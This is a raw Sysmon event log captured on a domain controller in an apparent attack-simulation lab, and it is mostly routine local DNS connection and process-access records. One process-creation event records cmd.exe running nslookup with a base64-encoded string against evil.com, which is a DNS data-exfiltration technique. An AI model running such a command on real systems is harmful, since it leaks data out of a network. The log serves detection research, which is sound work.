14:21:36.750{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50894- 354300x8000000000000000211306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.750{00000000-0000-0000-0000-000000000000}7488<unknown process>-udptruefalse127.0.0.1-50894-false127.0.0.1-53domain 354300x8000000000000000211305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.674{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50893- 354300x8000000000000000211304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.674{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50892- 354300x8000000000000000211303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.673{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50891- 354300x8000000000000000211302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.590{00000000-0000-0000-0000-000000000000}4468<unknown process>-udpfalsefalse127.0.0.1-50890-false127.0.0.1-53domain 354300x8000000000000000211301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.590{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50890- 354300x8000000000000000211300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.590{00000000-0000-0000-0000-000000000000}4468<unknown process>-udptruefalse127.0.0.1-50890-false127.0.0.1-53domain 354300x8000000000000000211299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.590{00000000-0000-0000-0000-000000000000}4468<unknown process>-udpfalsefalse127.0.0.1-50889-false127.0.0.1-53domain 354300x8000000000000000211298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.590{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50889- 354300x8000000000000000211297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.589{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50888- 354300x8000000000000000211296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.507{00000000-0000-0000-0000-000000000000}7476<unknown process>-udpfalsefalse127.0.0.1-50887-false127.0.0.1-53domain 354300x8000000000000000211295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.507{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50887- 354300x8000000000000000211294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.507{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50886- 354300x8000000000000000211293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.507{00000000-0000-0000-0000-000000000000}7476<unknown process>-udptruefalse127.0.0.1-50886-false127.0.0.1-53domain 354300x8000000000000000211292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.507{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50885- 354300x8000000000000000211291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.426{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50884- 354300x8000000000000000211290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.327{00000000-0000-0000-0000-000000000000}7480<unknown process>-udpfalsefalse127.0.0.1-50883-false127.0.0.1-53domain 354300x8000000000000000211289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.327{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50883- 354300x8000000000000000211288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.327{00000000-0000-0000-0000-000000000000}7480<unknown process>-udptruefalse127.0.0.1-50883-false127.0.0.1-53domain 354300x8000000000000000211287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.327{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50882- 354300x8000000000000000211286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.327{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50881- 354300x8000000000000000211285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.251{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50880- 354300x8000000000000000211284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.251{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50879- 354300x8000000000000000211283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.250{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50878- 354300x8000000000000000211282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.250{00000000-0000-0000-0000-000000000000}4908<unknown process>-udptruefalse127.0.0.1-50878-false127.0.0.1-53domain 354300x8000000000000000211281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.186{00000000-0000-0000-0000-000000000000}2568<unknown process>-udpfalsefalse127.0.0.1-50877-false127.0.0.1-53domain 354300x8000000000000000211280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.186{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50877- 354300x8000000000000000211279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.186{00000000-0000-0000-0000-000000000000}2568<unknown process>-udptruefalse127.0.0.1-50877-false127.0.0.1-53domain 354300x8000000000000000211278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.186{00000000-0000-0000-0000-000000000000}2568<unknown process>-udpfalsefalse127.0.0.1-50876-false127.0.0.1-53domain 354300x8000000000000000211277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.186{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50876- 354300x8000000000000000211276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.185{00000000-0000-0000-0000-000000000000}2568<unknown process>-udptruefalse127.0.0.1-50876-false127.0.0.1-53domain 354300x8000000000000000211275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.185{00000000-0000-0000-0000-000000000000}2568<unknown process>-udpfalsefalse127.0.0.1-50875-false127.0.0.1-53domain 10341000x8000000000000000211274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.297{2E1864BB-18F2-629A-9344-000000005F02}66564816C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-9444-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000211273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.185{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50875- 354300x8000000000000000211272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.185{00000000-0000-0000-0000-000000000000}2568<unknown process>-udptruefalse127.0.0.1-50875-false127.0.0.1-53domain 354300x8000000000000000211271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.082{00000000-0000-0000-0000-000000000000}1216<unknown process>-udpfalsefalse127.0.0.1-50874-false127.0.0.1-53domain 354300x8000000000000000211270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.082{00000000-0000-0000-0000-000000000000}1216<unknown process>-udptruefalse127.0.0.1-50874-false127.0.0.1-53domain 354300x8000000000000000211269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.082{00000000-0000-0000-0000-000000000000}1216<unknown process>-udpfalsefalse127.0.0.1-50873-false127.0.0.1-53domain 354300x8000000000000000211268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.082{00000000-0000-0000-0000-000000000000}1216<unknown process>-udptruefalse127.0.0.1-50873-false127.0.0.1-53domain 354300x8000000000000000211267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.082{00000000-0000-0000-0000-000000000000}1216<unknown process>-udpfalsefalse127.0.0.1-50872-false127.0.0.1-53domain 354300x8000000000000000211266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.081{00000000-0000-0000-0000-000000000000}1216<unknown process>-udptruefalse127.0.0.1-50872-false127.0.0.1-53domain 354300x8000000000000000211265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.009{00000000-0000-0000-0000-000000000000}5048<unknown process>-udpfalsefalse127.0.0.1-50871-false127.0.0.1-53domain 354300x8000000000000000211264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.009{00000000-0000-0000-0000-000000000000}5048<unknown process>-udptruefalse127.0.0.1-50871-false127.0.0.1-53domain 354300x8000000000000000211263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.009{00000000-0000-0000-0000-000000000000}5048<unknown process>-udpfalsefalse127.0.0.1-50870-false127.0.0.1-53domain 354300x8000000000000000211262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.009{00000000-0000-0000-0000-000000000000}5048<unknown process>-udptruefalse127.0.0.1-50870-false127.0.0.1-53domain 354300x8000000000000000211261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.009{00000000-0000-0000-0000-000000000000}5048<unknown process>-udpfalsefalse127.0.0.1-50869-false127.0.0.1-53domain 354300x8000000000000000211260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.008{00000000-0000-0000-0000-000000000000}5048<unknown process>-udptruefalse127.0.0.1-50869-false127.0.0.1-53domain 354300x8000000000000000211259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.942{00000000-0000-0000-0000-000000000000}4904<unknown process>-udpfalsefalse127.0.0.1-50868-false127.0.0.1-53domain 354300x8000000000000000211258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.941{00000000-0000-0000-0000-000000000000}4904<unknown process>-udptruefalse127.0.0.1-50868-false127.0.0.1-53domain 354300x8000000000000000211257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.870{00000000-0000-0000-0000-000000000000}4364<unknown process>-udpfalsefalse127.0.0.1-50867-false127.0.0.1-53domain 354300x8000000000000000211256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.870{00000000-0000-0000-0000-000000000000}4364<unknown process>-udptruefalse127.0.0.1-50867-false127.0.0.1-53domain 354300x8000000000000000211255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.870{00000000-0000-0000-0000-000000000000}4364<unknown process>-udpfalsefalse127.0.0.1-50866-false127.0.0.1-53domain 354300x8000000000000000211254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.869{00000000-0000-0000-0000-000000000000}4364<unknown process>-udptruefalse127.0.0.1-50866-false127.0.0.1-53domain 354300x8000000000000000211253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.869{00000000-0000-0000-0000-000000000000}4364<unknown process>-udpfalsefalse127.0.0.1-50865-false127.0.0.1-53domain 354300x8000000000000000211252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.868{00000000-0000-0000-0000-000000000000}4364<unknown process>-udptruefalse127.0.0.1-50865-false127.0.0.1-53domain 10341000x8000000000000000211251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.281{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9444-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.281{2E1864BB-18F2-629A-9244-000000005F02}28488028C:\Windows\system32\cmd.exe{2E1864BB-18F2-629A-9444-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.287{2E1864BB-18F2-629A-9444-000000005F02}5836C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F2-629A-9244-000000005F02}2848C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgxxkg.tmp 2>&1 10341000x8000000000000000211244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.244{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9344-000000005F02}6656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.244{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9344-000000005F02}6656C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.244{2E1864BB-18F2-629A-9344-000000005F02}66564816C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-9244-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.228{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9344-000000005F02}6656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 